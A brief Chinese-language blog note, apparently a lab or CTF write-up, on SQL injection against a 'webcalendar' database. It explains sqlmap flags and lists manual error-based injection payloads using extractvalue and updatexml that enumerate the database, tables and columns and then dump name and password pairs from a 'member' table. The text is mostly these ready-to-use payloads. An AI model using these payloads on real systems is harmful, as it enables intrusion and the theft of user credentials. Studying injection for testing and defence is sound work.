1.具体sqlmap的破解方法:
https://www.cnblogs.com/qtisec/p/11097191.html
注:其中在注入点,例id:*,表示只在id出进行注入,也可指定注入的参数,sqlmap -p id
—batch 一切进行默认,不需要用户进行确认
—dump 生成dbms表
2.使用手工进行注入:
具体extractvalue语句参考:https://blog.csdn.net/bangyan3903/article/details/101788019
具体手工参考:https://blog.csdn.net/mutou990/article/details/107761999
示例:
‘ and extractvalue(1,concat(0x7e,(select database()),0x7e)) and ‘1’ =’1
‘ and extractvalue(1,concat(0x7e,(select group_concat(table_name)from information_schema.tables where table_schema=’webcalendar’),0x7e)) and ‘1’ =’1
‘ and extractvalue(1,concat(0x7e,(select group_concat(column_name)from information_schema.columns where table_name=’member’),0x7e)) and ‘1’ =’1
‘ and updatexml(1,concat(0x7e,(SELECT distinct concat(0x23,name,0x3a,password,0x23) FROM member limit 0,1),0x7e),1) and ‘1’=’1 两种结合使用!
若有收获,就点个赞吧
0 人点赞
